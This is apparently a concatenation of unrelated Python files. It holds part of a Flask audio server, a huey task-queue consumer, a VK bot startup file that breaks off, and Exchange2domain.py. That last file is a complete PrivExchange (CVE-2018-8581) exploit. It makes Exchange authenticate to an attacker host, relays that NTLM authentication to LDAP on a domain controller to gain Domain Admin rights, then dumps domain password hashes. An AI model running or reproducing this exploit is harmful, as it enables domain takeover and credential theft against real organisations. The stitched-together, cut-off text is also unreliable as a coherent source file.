configured and # saved in a cookie, then set one up. deviceid = get_userid() if deviceid == None: deviceid = secrets.token_urlsafe(16) resp = make_response(deviceid,200) resp.set_cookie('deviceid',deviceid,max_age=31536000) return resp print( deviceid + ' has connected') # make sure the message queues and process queue is setup # for this client. if deviceid not in messageQueues: messageQueues[deviceid] = collections.deque(maxlen=50) if deviceid not in procMap: procMap[deviceid] = None return deviceid @app.route('/cleanup') def cleanup(): """ When the client has retrieved everything it needs, then it will call /cleanup to get rid of any of the intermediate files. Returns: flask.Response: HTTP 200 OK """ fileList = glob.glob(tempfile.gettempdir() + '/' + get_userid() + '*') for file in fileList: os.remove(file) messageQueues[get_userid()].clear() return "OK" @app.route('/upload_audio', methods=['POST']) def upload_audio(): """ The client uploads audio to process to this endpoint Returns: falsk.Response: a redirect to the index.html page """ file = request.files['file'] deviceid = get_userid() # save the uploaded file of = tempfile.gettempdir() + '/' +deviceid + '.tmp' file.save(of) print( deviceid + ' uploaded: ' + file.filename ) # save off the track info with open(tempfile.gettempdir() + '/' + deviceid + '.tmp.info.json', 'w') as f: j = {'title': file.filename, 'thumbnail':'/static/favicon.ico'} f.write(json.dumps(j)) # if there's already an audio processing subproc running for this client, # then kill it. proc = procMap[deviceid] if proc != None and proc.is_alive(): print('!!!!!! killing', proc.pid, '!!!!!') proc.terminate() # kick of a proc to process the audio. procMap[deviceid] = Process(target=process_audio, args=(of, deviceid, True)) procMap[deviceid].start() return index() if __name__ == '__main__': # The main thread. Listens on any IP address and port 8000 compress.init_app(app) socketio.run(app, host="0.0.0.0", port=8000)
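# --- Illustrative client sketch (not part of the original main.py) ----------
# One way a hypothetical client could drive the endpoints above with plain
# `requests`: get a device id from /whoami, start processing with /fetch_url,
# poll /getQueue until the 'ready' event appears, then pull /beatmap and
# /playvector.  The base URL, example Youtube URL, and the polling loop are
# assumptions made for illustration; the real web UI listens for socket.io
# pushes instead of polling, so treat this only as a sketch of the request
# flow.  It is not wired into the Flask app and would be run from a separate
# process.

def example_client_flow(base='http://localhost:8000',
                        url='https://www.youtube.com/watch?v=XXXXXXXXXXX'):
    import json
    import time

    import requests

    session = requests.Session()

    # /whoami creates the 'deviceid' cookie that every later call relies on,
    # and sets up the message/process queues for this client.
    deviceid = session.get(base + '/whoami').text
    print('device id: ' + deviceid)

    # Kick off background processing of the (hypothetical) Youtube URL.
    session.get(base + '/fetch_url', params={'url': url})

    # Poll /getQueue until the 'ready' event appears.  Like the real client,
    # remember the id of the last message handled so repeated polls (or a
    # reconnect) don't replay old status updates.
    last_id = -1
    while True:
        ready = False
        for item in session.get(base + '/getQueue').json():
            if item['id'] <= last_id:
                continue
            last_id = item['id']
            if item['event'] == 'status':
                print(json.loads(item['message'])['message'])
            elif item['event'] == 'ready':
                ready = True
        if ready:
            break
        time.sleep(2)

    beatmap = session.get(base + '/beatmap').json()
    play_vector = session.get(base + '/playvector').json()
    print('%d beats, %d entries in the play vector'
          % (len(beatmap), len(play_vector)))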
Exchange2domain.py
#!/usr/bin/env python # -*- coding: UTF-8 -*- import ssl import argparse import logging import sys import getpass import base64 import re import binascii import time import config import xml.etree.ElementTree as ET from httplib import HTTPConnection, HTTPSConnection, ResponseNotReady from impacket import ntlm from comm import logger from comm.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer from comm.ntlmrelayx.utils.config import NTLMRelayxConfig from comm.ntlmrelayx.utils.targetsutils import TargetsProcessor from comm.ntlmrelayx.clients import PROTOCOL_CLIENTS from comm.ntlmrelayx.attacks import PROTOCOL_ATTACKS from multiprocessing import Manager from threading import Thread, Lock, currentThread from comm.secretsdump import DumpSecrets # Init logging logger.init() logging.getLogger().setLevel(logging.INFO) start = time.time() LOGO =R""" โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–’โ–ˆโ–ˆ โ–ˆโ–ˆโ–’ โ–„โ–ˆโ–ˆโ–ˆโ–ˆโ–„ โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆ โ–„โ–„โ–„ โ–ˆโ–ˆโ–ˆโ–„ โ–ˆ โ–„โ–ˆโ–ˆโ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–“โ–ˆ โ–€ โ–’โ–’ โ–ˆ โ–ˆ โ–’โ–‘โ–’โ–ˆโ–ˆโ–€ โ–€โ–ˆ โ–“โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–„ โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆ โ–ˆโ–ˆโ–’ โ–€โ–ˆโ–’โ–“โ–ˆ โ–€ โ–’โ–ˆโ–ˆโ–ˆ โ–‘โ–‘ โ–ˆ โ–‘โ–’โ–“โ–ˆ โ–„ โ–’โ–ˆโ–ˆโ–€โ–€โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆ โ–€โ–ˆโ–„ โ–“โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–‘โ–„โ–„โ–„โ–‘โ–’โ–ˆโ–ˆโ–ˆ โ–’โ–“โ–ˆ โ–„ โ–‘ โ–ˆ โ–ˆ โ–’ โ–’โ–“โ–“โ–„ โ–„โ–ˆโ–ˆโ–’โ–‘โ–“โ–ˆ โ–‘โ–ˆโ–ˆ โ–‘โ–ˆโ–ˆโ–„โ–„โ–„โ–„โ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–’ โ–โ–Œโ–ˆโ–ˆโ–’โ–‘โ–“โ–ˆ โ–ˆโ–ˆโ–“โ–’โ–“โ–ˆ โ–„ โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–’ โ–’โ–ˆโ–ˆโ–’โ–’ โ–“โ–ˆโ–ˆโ–ˆโ–€ โ–‘โ–‘โ–“โ–ˆโ–’โ–‘โ–ˆโ–ˆโ–“ โ–“โ–ˆ โ–“โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–‘ โ–“โ–ˆโ–ˆโ–‘โ–‘โ–’โ–“โ–ˆโ–ˆโ–ˆโ–€โ–’โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–’ โ–‘โ–‘ โ–’โ–‘ โ–‘โ–’โ–’ โ–‘ โ–‘โ–“ โ–‘โ–‘ โ–‘โ–’ โ–’ โ–‘ โ–’ โ–‘โ–‘โ–’โ–‘โ–’ โ–’โ–’ โ–“โ–’โ–ˆโ–‘โ–‘ โ–’โ–‘ โ–’ โ–’ โ–‘โ–’ โ–’ โ–‘โ–‘ โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘โ–‘ โ–‘โ–’ โ–‘ โ–‘ โ–’ โ–’ โ–‘โ–’โ–‘ โ–‘ โ–’ โ–’โ–’ โ–‘โ–‘ โ–‘โ–‘ โ–‘ โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘ โ–‘ โ–‘ โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ """ # SOAP request for EWS # Source: https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/subscribe-operation # Credits: https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange POST_BODY = '''<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"> <soap:Header> <t:RequestServerVersion Version="%s" /> </soap:Header> <soap:Body > <m:Subscribe> <m:PushSubscriptionRequest SubscribeToAllFolders="true"> <t:EventTypes> <t:EventType>NewMailEvent</t:EventType> <t:EventType>ModifiedEvent</t:EventType> <t:EventType>MovedEvent</t:EventType> </t:EventTypes> <t:StatusFrequency>1</t:StatusFrequency> <t:URL>%s</t:URL> </m:PushSubscriptionRequest> </m:Subscribe> </soap:Body> </soap:Envelope> ''' def startServers(passargs): targetSystem = passargs.target_host privuser = passargs.user PoppedDB = Manager().dict() # A dict of PoppedUsers PoppedDB_Lock = Lock() # A lock for opening the dict relayServers = [HTTPRelayServer] serverThreads = [] for server in relayServers: c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setTargets(TargetsProcessor(singleTarget=str("ldap://"+targetSystem),protocolClients=PROTOCOL_CLIENTS)) c.setOutputFile(None) c.setEncoding('ascii') c.setMode('RELAY') c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir('.') 
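        # Descriptive note: each relay server listens on --attacker-port and
        # relays the NTLM authentication that Exchange sends back (triggered by
        # the EWS push subscription created in exploit()) to LDAP on the target
        # DC, where the LDAP attack escalates `privuser`; checkauth()/gethash()
        # then run the secretsdump step once that escalation succeeds.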
c.setInterfaceIp("0.0.0.0") c.setInterfacePort(int(passargs.attacker_port)) c.setLDAPOptions(True, True, True, privuser) c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers s = server(c) s.start() serverThreads.append(s) logging.info("Relay servers started, waiting for connection....") try: status = exploit(passargs) if status: exp = Thread(target=checkauth, args=(passargs,)) exp.daemon = True exp.start() try: while exp.isAlive(): pass except KeyboardInterrupt, e: logging.info("Shutting down...") for thread in serverThreads: thread.server.shutdown() else: logging.error("Error in exploit, Shutting down...") for thread in serverThreads: thread.server.shutdown() except: logging.error("Error in exploit, Shutting down...") logging.info("Shutting down...") def checkauth(passargs): suc = config.get_suc() logging.info("Waiting for Auth...") while True: if suc == True: gethash(passargs) break else: suc = config.get_suc() fal = config.get_fail() if fal == True: logging.error("Get auth failed, exiting...") break else: tmp = time.time() - start if tmp > passargs.timeout: logging.error("Time Out. exiting...") break def gethash(passargs): remoteName = passargs.target_host username = passargs.user password = passargs.password domain = passargs.domain execmethod = passargs.exec_method if passargs.just_dc_user: dcuser = passargs.just_dc_user else: dcuser = None getpriv = config.get_priv() while True: if getpriv == True: dumper = DumpSecrets(remoteName, username, password, domain,execmethod,dcuser) try: check = dumper.dump() break except Exception, e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error(e) else: getpriv = config.get_priv() def exploit(args): ews_url = "/EWS/Exchange.asmx" exchange_version = args.exchange_version # Should we log debug stuff? if args.debug is True: logging.getLogger().setLevel(logging.DEBUG) if args.password is None and args.hashes is None: args.password = getpass.getpass() # Init connection if not args.no_ssl: # HTTPS = default port = 443 if args.exchange_port: port = int(args.exchange_port) try: uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) session = HTTPSConnection(args.host, port, timeout=10,context=uv_context) except AttributeError: session = HTTPSConnection(args.host, port, timeout=10) else: # Otherwise: HTTP port = 80 if args.exchange_port: port = int(args.exchange_port) session = HTTPConnection(args.host, port, timeout=10) # Construct attacker url if args.attacker_port != 80: attacker_url = 'http://%s:%d%s' % (args.attacker_host, int(args.attacker_port), args.attacker_page) else: attacker_url = 'http://%s%s' % (args.attacker_host, args.attacker_page) logging.info('Using attacker URL: %s', attacker_url) # Use impacket for NTLM ntlm_nego = ntlm.getNTLMSSPType1(args.attacker_host, domain=args.domain) #Negotiate auth negotiate = base64.b64encode(ntlm_nego.getData()) # Headers # Source: https://github.com/thezdi/PoC/blob/master/CVE-2018-8581/Exch_EWS_pushSubscribe.py headers = { "Authorization": 'NTLM %s' % negotiate, "Content-type": "text/xml; charset=utf-8", "Accept": "text/xml", "User-Agent": "ExchangeServicesClient/0.0.0.0", "Translate": "F" } session.request("POST", ews_url, POST_BODY % (exchange_version,attacker_url), headers) res = session.getresponse() res.read() # Copied from ntlmrelayx httpclient.py if res.status != 401: logging.info('Status code returned: %d. 
Authentication does not seem required for URL', res.status) try: if 'NTLM' not in res.getheader('WWW-Authenticate'): logging.error('NTLM Auth not offered by URL, offered protocols: %s', res.getheader('WWW-Authenticate')) return False except (KeyError, TypeError): logging.error('No authentication requested by the server for url %s', ews_url) return False logging.debug('Got 401, performing NTLM authentication') # Get negotiate data try: ntlm_challenge_b64 = re.search('NTLM ([a-zA-Z0-9+/]+={0,2})', res.getheader('WWW-Authenticate')).group(1) ntlm_challenge = base64.b64decode(ntlm_challenge_b64) except (IndexError, KeyError, AttributeError): logging.error('No NTLM challenge returned from server') return False if args.hashes: lm_hash_h, nt_hash_h = args.hashes.split(':') # Convert to binary format lm_hash = binascii.unhexlify(lm_hash_h) nt_hash = binascii.unhexlify(nt_hash_h) args.password = '' else: nt_hash = '' lm_hash = '' ntlm_auth, _ = ntlm.getNTLMSSPType3(ntlm_nego, ntlm_challenge, args.user, args.password, args.domain, lm_hash, nt_hash) auth = base64.b64encode(ntlm_auth.getData()) #print("Get Auth: "+auth) headers = { "Authorization": 'NTLM %s' % auth, "Content-type": "text/xml; charset=utf-8", "Accept": "text/xml", "User-Agent": "ExchangeServicesClient/0.0.0.0", "Translate": "F" } session.request("POST", ews_url, POST_BODY % (exchange_version,attacker_url), headers) res = session.getresponse() logging.debug('HTTP status: %d', res.status) body = res.read() logging.debug('Body returned: %s', body) if res.status == 200: logging.info('Exchange returned HTTP status 200 - authentication was OK') # Parse XML with ElementTree root = ET.fromstring(body) code = None for response in root.iter('{http://schemas.microsoft.com/exchange/services/2006/messages}ResponseCode'): code = response.text if not code: logging.error('Could not find response code element in body: %s', body) return False if code == 'NoError': logging.critical('API call was successful') return True elif code == 'ErrorMissingEmailAddress': logging.error('The user you authenticated with does not have a mailbox associated. Try a different user.') return False else: logging.error('Unknown error %s', code) for errmsg in root.iter('{http://schemas.microsoft.com/exchange/services/2006/messages}ResponseMessages'): logging.error('Server returned: %s', errmsg.text) return False elif res.status == 401: logging.error('Server returned HTTP status 401 - authentication failed') return False else: logging.error('Server returned HTTP %d: %s', res.status, body) return True def main(): parser = argparse.ArgumentParser(description='Exchange your privileges for Domain Admin privs by abusing Exchange. 
Use me with ntlmrelayx') parser.add_argument("host", type=str, metavar='HOSTNAME', help="Hostname/ip of the Exchange server") parser.add_argument("-u", "--user", metavar='USERNAME', help="username for authentication") parser.add_argument("-d", "--domain", metavar='DOMAIN', help="domain the user is in (FQDN or NETBIOS domain name)") parser.add_argument("-p", "--password", metavar='PASSWORD', help="Password for authentication, will prompt if not specified and no NT:NTLM hashes are supplied") parser.add_argument('--hashes', action='store', help='LM:NLTM hashes') parser.add_argument("--no-ssl", action='store_true', help="Don't use HTTPS (connects on port 80)") parser.add_argument("--exchange-port", help="Alternative EWS port (default: 443 or 80)") parser.add_argument("-ah", "--attacker-host", required=True, help="Attacker hostname or IP") parser.add_argument("-ap", "--attacker-port", default=80, help="Port on which the relay attack runs (default: 80)") parser.add_argument("-th", "--target-host", required=True, help="Hostname or IP of the DC") parser.add_argument("-t", "--timeout", default='120',type=int, help='timeout in seconds') parser.add_argument('--exec-method', choices=['smbexec', 'wmiexec', 'mmcexec'], nargs='?', default='smbexec', help='Remote exec ' 'method to use at target (only when using -use-vss). Default: smbexec') parser.add_argument("--exchange-version",default='Exchange2013',help='Exchange version of the target (default: Exchange2013, choices:Exchange2010,Exchange2010_SP1,Exchange2010_SP2,Exchange2013,Exchange2013_SP1,Exchange2016)',) parser.add_argument("--attacker-page", default="/privexchange/", help="Page to request on attacker server (default: /privexchange/)") parser.add_argument('--just-dc-user', action='store', metavar='USERNAME', help='Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach.') parser.add_argument("--debug", action='store_true', help='Enable debug output') passargs = parser.parse_args() startServers(passargs) if __name__ == '__main__': print(LOGO) main()
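# --- Illustrative sketch (not part of the original Exchange2domain.py) ------
# The success check in exploit() hinges on finding a ResponseCode element in
# the EWS "messages" namespace of the SOAP body.  The helper below shows the
# same namespaced ElementTree lookup in isolation; the sample response is
# hand-written for illustration, not captured from a real Exchange server, and
# it reuses the module-level `ET` import above.

MSG_NS = '{http://schemas.microsoft.com/exchange/services/2006/messages}'

SAMPLE_SUBSCRIBE_RESPONSE = '''<Envelope xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
  <Body>
    <m:SubscribeResponse>
      <m:ResponseMessages>
        <m:SubscribeResponseMessage ResponseClass="Success">
          <m:ResponseCode>NoError</m:ResponseCode>
        </m:SubscribeResponseMessage>
      </m:ResponseMessages>
    </m:SubscribeResponse>
  </Body>
</Envelope>'''


def _demo_parse_response_code(body=SAMPLE_SUBSCRIBE_RESPONSE):
    # Same pattern as exploit(): walk every namespaced ResponseCode element
    # and keep the last one.  'NoError' means the push subscription was
    # accepted, which exploit() treats as success before waiting for the
    # relayed authentication.
    root = ET.fromstring(body)
    code = None
    for response in root.iter(MSG_NS + 'ResponseCode'):
        code = response.text
    return code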
consumer.py
import datetime
import logging
import os
import signal
import threading
import time
from collections import defaultdict
from multiprocessing import Event as ProcessEvent
from multiprocessing import Process

try:
    import gevent
    from gevent import Greenlet
    from gevent.event import Event as GreenEvent
except ImportError:
    Greenlet = GreenEvent = None

from huey.exceptions import DataStoreGetException
from huey.exceptions import QueueException
from huey.exceptions import QueueReadException
from huey.exceptions import DataStorePutException
from huey.exceptions import QueueWriteException
from huey.exceptions import ScheduleAddException
from huey.exceptions import ScheduleReadException
from huey.registry import registry

EVENT_CHECKING_PERIODIC = 'checking-periodic'
EVENT_ERROR_DEQUEUEING = 'error-dequeueing'
EVENT_ERROR_ENQUEUEING = 'error-enqueueing'
EVENT_ERROR_INTERNAL = 'error-internal'
EVENT_ERROR_SCHEDULING = 'error-scheduling'
EVENT_ERROR_STORING_RESULT = 'error-storing-result'
EVENT_ERROR_TASK = 'error-task'
EVENT_FINISHED = 'finished'
EVENT_RETRYING = 'retrying'
EVENT_REVOKED = 'revoked'
EVENT_SCHEDULED = 'scheduled'
EVENT_SCHEDULING_PERIODIC = 'scheduling-periodic'
EVENT_STARTED = 'started'


def to_timestamp(dt):
    if dt:
        return time.mktime(dt.timetuple())


class BaseProcess(object):
    def __init__(self, huey, utc):
        self.huey = huey
        self.utc = utc

    def get_now(self):
        if self.utc:
            return datetime.datetime.utcnow()
        return datetime.datetime.now()

    def get_timestamp(self):
        return time.mktime(self.get_now().timetuple())

    def sleep_for_interval(self, start_ts, nseconds):
        delta = time.time() - start_ts
        if delta < nseconds:
            seconds = nseconds - (time.time() - start_ts)
            self._logger.debug('Sleeping for %s' % seconds)
            time.sleep(nseconds - (time.time() - start_ts))

    def enqueue(self, task):
        try:
            self.huey.enqueue(task)
        except QueueWriteException:
            self.huey.emit_task(EVENT_ERROR_ENQUEUEING, task, error=True)
            self._logger.error('Error enqueueing task: %s' % task)
        else:
            self._logger.debug('Enqueued task: %s' % task)

    def loop(self, now=None):
        raise NotImplementedError


class Worker(BaseProcess):
    def __init__(self, huey, default_delay, max_delay, backoff, utc):
        self.delay = self.default_delay = default_delay
        self.max_delay = max_delay
        self.backoff = backoff
        self._logger = logging.getLogger('huey.consumer.Worker')
        super(Worker, self).__init__(huey, utc)

    def loop(self, now=None):
        task = None
        exc_raised = True
        try:
            task = self.huey.dequeue()
        except QueueReadException as exc:
            self.huey.emit_task(EVENT_ERROR_DEQUEUEING, task, error=True)
            self._logger.exception('Error reading from queue')
        except QueueException:
            self.huey.emit_task(EVENT_ERROR_INTERNAL, task, error=True)
            self._logger.exception('Queue exception')
        except KeyboardInterrupt:
            raise
        except:
            self.huey.emit_task(EVENT_ERROR_DEQUEUEING, task, error=True)
            self._logger.exception('Unknown exception dequeueing task.')
        else:
            exc_raised = False
        if task:
            self.delay = self.default_delay
            self.handle_task(task, now or self.get_now())
        elif exc_raised or not self.huey.blocking:
            self.sleep()

    def sleep(self):
        if self.delay > self.max_delay:
            self.delay = self.max_delay
        self._logger.debug('No messages, sleeping for: %s' % self.delay)
        time.sleep(self.delay)
        self.delay *= self.backoff

    def handle_task(self, task, ts):
        if not self.huey.ready_to_run(task, ts):
            self.add_schedule(task)
        elif not self.is_revoked(task, ts):
            self.process_task(task, ts)
        else:
            self.huey.emit_task(
                EVENT_REVOKED, task, timestamp=to_timestamp(ts))
            self._logger.debug('Task %s was revoked, not running' % task)

    def _incr_metadata(self, task, key, value=1):
        self.huey.incr_metadata('_'.join((task.name, key)), value)
        self.huey.incr_metadata('_'.join(('tasks', key)), value)

    def process_task(self, task, ts):
        self.huey.emit_task(EVENT_STARTED, task, timestamp=to_timestamp(ts))
        self._logger.info('Executing %s' % task)
        start = time.time()
        try:
            try:
                self.huey.execute(task)
            finally:
                duration = time.time() - start
                self._logger.debug('Task %s ran in %0.3fs' % (task, duration))
        except DataStorePutException:
            self.huey.emit_task(
                EVENT_ERROR_STORING_RESULT, task, error=True,
                duration=duration)
            self._logger.exception('Error storing result')
        except:
            self.huey.emit_task(
                EVENT_ERROR_TASK, task, error=True, duration=duration)
            self._incr_metadata(task, 'errors')
            self._logger.exception('Unhandled exception in worker thread')
            if task.retries:
                self.requeue_task(task, self.get_now())
        else:
            self.huey.emit_task(
                EVENT_FINISHED, task, duration=duration,
                timestamp=self.get_timestamp())
            self._incr_metadata(task, 'executed')
            self._incr_metadata(task, 'duration', duration)

    def requeue_task(self, task, ts):
        task.retries -= 1
        self.huey.emit_task(EVENT_RETRYING, task)
        self._logger.info('Re-enqueueing task %s, %s tries left' %
                          (task.task_id, task.retries))
        if task.retry_delay:
            delay = datetime.timedelta(seconds=task.retry_delay)
            task.execute_time = ts + delay
            self.add_schedule(task)
        else:
            self.enqueue(task)

    def add_schedule(self, task):
        self._logger.info('Adding %s to schedule' % task)
        try:
            self.huey.add_schedule(task)
        except ScheduleAddException:
            self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
            self._logger.error('Error adding task to schedule: %s' % task)
        else:
            self.huey.emit_task(EVENT_SCHEDULED, task)
            self._incr_metadata(task, 'scheduled')

    def is_revoked(self, task, ts):
        try:
            if self.huey.is_revoked(task, ts, peek=False):
                return True
            return False
        except DataStoreGetException:
            self.huey.emit_task(EVENT_ERROR_INTERNAL, task, error=True)
            self._logger.error('Error checking if task is revoked: %s' % task)
            return True


class Scheduler(BaseProcess):
    def __init__(self, huey, interval, utc, periodic):
        super(Scheduler, self).__init__(huey, utc)
        self.interval = min(interval, 60)
        self.periodic = periodic
        if periodic:
            # Determine the periodic task interval.
            self._q, self._r = divmod(60, self.interval)
            if not self._r:
                self._q -= 1
            self._counter = 0
        self._logger = logging.getLogger('huey.consumer.Scheduler')

    def loop(self, now=None):
        now = now or self.get_now()
        start = time.time()
        for task in self.huey.read_schedule(now):
            self._logger.info('Scheduling %s for execution' % task)
            self.enqueue(task)
        should_sleep = True
        if self.periodic:
            if self._counter == self._q:
                if self._r:
                    self.sleep_for_interval(start, self._r)
                self.huey.emit_status(
                    EVENT_CHECKING_PERIODIC,
                    timestamp=self.get_timestamp())
                self._logger.debug('Checking periodic tasks')
                self._counter = 0
                for task in self.huey.read_periodic(now):
                    self.huey.emit_task(
                        EVENT_SCHEDULING_PERIODIC, task,
                        timestamp=self.get_timestamp())
                    self._logger.info('Scheduling periodic task %s.' % task)
                    self.enqueue(task)
                self.sleep_for_interval(start, self.interval - self._r)
                should_sleep = False
            else:
                self._counter += 1
        if should_sleep:
            self.sleep_for_interval(start, self.interval)


class Environment(object):
    def get_stop_flag(self):
        raise NotImplementedError

    def create_process(self, runnable, name):
        raise NotImplementedError


class ThreadEnvironment(Environment):
    def get_stop_flag(self):
        return threading.Event()

    def create_process(self, runnable, name):
        t = threading.Thread(target=runnable, name=name)
        t.daemon = True
        return t


class GreenletEnvironment(Environment):
    def get_stop_flag(self):
        return GreenEvent()

    def create_process(self, runnable, name):
        def run_wrapper():
            gevent.sleep()
            runnable()
            gevent.sleep()
        return Greenlet(run=run_wrapper)


class ProcessEnvironment(Environment):
    def get_stop_flag(self):
        return ProcessEvent()

    def create_process(self, runnable, name):
        p = Process(target=runnable, name=name)
        p.daemon = True
        return p


worker_to_environment = {
    'thread': ThreadEnvironment,
    'greenlet': GreenletEnvironment,
    'gevent': GreenletEnvironment,  # Same as greenlet.
    'process': ProcessEnvironment,
}


class Consumer(object):
    def __init__(self, huey, workers=1, periodic=True, initial_delay=0.1,
                 backoff=1.15, max_delay=10.0, utc=True, scheduler_interval=1,
                 worker_type='thread'):
        self._logger = logging.getLogger('huey.consumer')
        self.huey = huey
        self.workers = workers
        self.periodic = periodic
        self.default_delay = initial_delay
        self.backoff = backoff
        self.max_delay = max_delay
        self.utc = utc
        self.scheduler_interval = max(min(scheduler_interval, 60), 1)
        self.worker_type = worker_type
        if worker_type not in worker_to_environment:
            raise ValueError('worker_type must be one of %s.' %
                             ', '.join(worker_to_environment))
        else:
            self.environment = worker_to_environment[worker_type]()
        self._received_signal = False
        self.stop_flag = self.environment.get_stop_flag()

        scheduler = self._create_runnable(self._create_scheduler())
        self.scheduler = self.environment.create_process(
            scheduler, 'Scheduler')

        self.worker_threads = []
        for i in range(workers):
            worker = self._create_runnable(self._create_worker())
            self.worker_threads.append(self.environment.create_process(
                worker, 'Worker-%d' % (i + 1)))

    def _create_worker(self):
        return Worker(
            huey=self.huey,
            default_delay=self.default_delay,
            max_delay=self.max_delay,
            backoff=self.backoff,
            utc=self.utc)

    def _create_scheduler(self):
        return Scheduler(
            huey=self.huey,
            interval=self.scheduler_interval,
            utc=self.utc,
            periodic=self.periodic)

    def _create_runnable(self, consumer_process):
        def _run():
            try:
                while not self.stop_flag.is_set():
                    consumer_process.loop()
            except KeyboardInterrupt:
                pass
        return _run

    def metadata(self, **kwargs):
        for key, value in kwargs.items():
            self.huey.write_metadata(key, value)

    def initialize_metadata(self):
        # Set metadata.
        self.metadata(
            periodic_tasks='enabled' if self.periodic else 'disabled',
            scheduler_interval=self.scheduler_interval,
            tasks_duration=0.0,
            tasks_errors=0,
            tasks_executed=0,
            tasks_scheduled=0,
            workers=self.workers,
            worker_type=self.worker_type,
        )
        for command in registry._registry:
            self.metadata(**{
                command + '_duration': 0,
                command + '_errors': 0,
                command + '_executed': 0,
                command + '_scheduled': 0})

    def read_metadata(self):
        keys = [
            'periodic_tasks',
            'scheduler_interval',
            'tasks_duration',
            'tasks_errors',
            'tasks_executed',
            'tasks_scheduled',
            'workers',
            'worker_type',
        ]
        for command in registry._registry:
            keys.extend([
                command + '_duration',
                command + '_errors',
                command + '_executed',
                command + '_scheduled'])
        data = {}
        for key in keys:
            data[key] = self.huey.read_metadata(key)
        return data

    def start(self):
        # Log startup message.
        self._logger.info('Huey consumer started with %s %s, PID %s' % (
            self.workers, self.worker_type, os.getpid()))
        self._logger.info('Scheduler runs every %s seconds.' % (
            self.scheduler_interval))
        self._logger.info('Periodic tasks are %s.' % (
            'enabled' if self.periodic else 'disabled'))
        self._set_signal_handler()

        msg = ['The following commands are available:']
        for command in registry._registry:
            msg.append('+ %s' % command.replace('queuecmd_', ''))
        self._logger.info('\n'.join(msg))

        self.scheduler.start()
        for worker in self.worker_threads:
            worker.start()

    def stop(self):
        self.stop_flag.set()
        self._logger.info('Shutting down')

    def run(self):
        self.start()
        while True:
            try:
                is_set = self.stop_flag.wait(timeout=0.1)
                time.sleep(0.1)
            except KeyboardInterrupt:
                self.stop()
            except:
                self._logger.exception('Error in consumer.')
                self.stop()
            else:
                if self._received_signal:
                    self.stop()
            if self.stop_flag.is_set():
                break
        self._logger.info('Consumer exiting.')

    def _set_signal_handler(self):
        signal.signal(signal.SIGTERM, self._handle_signal)

    def _handle_signal(self, sig_num, frame):
        self._logger.info('Received SIGTERM')
        self._received_signal = True
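For context, here is a minimal sketch of how this Consumer is typically wired up to a huey application. It assumes huey's RedisHuey storage backend is installed and a Redis instance is reachable; the app name and the add task are illustrative only, not part of the file above.

# Minimal usage sketch -- illustrative only.
from huey import RedisHuey
from huey.consumer import Consumer

huey = RedisHuey('my-app')  # hypothetical application name


@huey.task()
def add(a, b):
    return a + b


if __name__ == '__main__':
    # Run two worker threads plus the scheduler, using the thread environment.
    consumer = Consumer(huey, workers=2, worker_type='thread')
    consumer.run()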
app.py
import logging

from vk import VK
from vk.bot_framework import Dispatcher
from vk.utils import TaskManager

from db.prestart import pre_start as pre_start_db
from shuecm.config import LOGGING_LEVEL
from shuecm.config import PRODUCTION
from shuecm.config import SENTRY_DSN
from shuecm.config import VK_GROUP_ID
from shuecm.config import VK_TOKEN

logging.basicConfig(level=LOGGING_LEVEL)
logger = logging.getLogger("shuecm.app")

vk = VK(VK_TOKEN)
dp = Dispatcher(vk, VK_GROUP_ID)


def setup_sentry():
    """
    Set up Sentry error tracking in the application.
    # TODO: move to utils.py.
    :return:
    """
    if PRODUCTION and SENTRY_DSN:
        import sentry_sdk

        sentry_sdk.init(SENTRY_DSN)
        logger.info("Sentry successfully initialized!")
    else:
        logger.info(
            "Sentry DSN not found or PRODUCTION variable is false. Sentry was not initialized."
        )


def setup_blueprints():
    """
    Register blueprints in the application.
    :return:
    """
    from shuecm.blueprints import info_bp, user_bp, admin_bp, role_bp

    dp.setup_blueprint(info_bp)
    logger.info("Informational blueprint successfully initialized!")

    dp.setup_blueprint(user_bp)
    logger.info("User blueprint successfully initialized!")

    dp.setup_blueprint(admin_bp)
    logger.info("Administration blueprint successfully initialized!")

    dp.setup_blueprint(role_bp)
    logger.info("Role blueprint successfully initialized!")


def setup_middlewares():
    """
    Register middlewares in the application.
    :return:
    """
    from shuecm.middlewares import (
        UsersRegistrationMiddleware,
        BotAdminMiddleware,
        ChatsRegistrationMiddleware,
    )

